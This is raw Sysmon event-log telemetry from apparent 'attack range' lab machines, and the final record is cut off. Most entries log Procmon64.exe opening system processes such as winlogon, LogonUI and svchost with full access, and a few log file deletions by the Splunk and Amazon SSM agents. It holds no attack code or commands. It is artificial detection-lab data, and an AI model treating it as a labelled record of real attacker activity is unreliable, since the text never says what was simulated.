10341000x8000000000000000288714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.185{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.184{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.183{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.182{C8EA50B7-F2AD-6215-C000-000000003802}48565668C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.155{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.134{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.128{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.128{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.128{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:57.128{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.975{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.971{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0F00-000000003802}304C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.848{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0F00-000000003802}304C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.846{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0E00-000000003802}988C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.736{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0E00-000000003802}988C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.734{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.689{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.682{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11C-6215-0900-000000003802}568C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.640{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11C-6215-0900-000000003802}568C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.581{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.563{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.405{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.401{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.313{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=287C6DD993E24869E97413A4C7A58C67,SHA256=5853947F4721AB023B5861BB652864A0E0BB17502F882D91EAFE8E25798BCEE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.310{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CDB3D2CB8A13F66B5CA4A08232432A2,SHA256=226A5A895CFBD70892304ED608CE11228B6AEC2F0E0918ECF485D3835EB5070F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.309{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=EE119DE0E7AC2F47FB69C1858C000A20,SHA256=5E2B9855EB24C1585290B44556294AE4758968599A12F4A31491FF0C9BDB8213,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.270{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.239{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:58.148{C8EA50B7-11CB-6216-2005-000000003802}23285788C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+8584e|C:\Users\Administrator\Downloads\Procmon64.exe+764a3|C:\Users\Administrator\Downloads\Procmon64.exe+2e9c3|C:\Users\Administrator\Downloads\Procmon64.exe+7668b|C:\Users\Administrator\Downloads\Procmon64.exe+74871|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216886Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:58.264{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94EB7528FB9568335892376B65694B13,SHA256=D2FFB278FDD5CF1170ED974E0E28531E39DB2C1FCC806FF612BAA58B877013F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216888Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:59.786{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-135MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216887Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 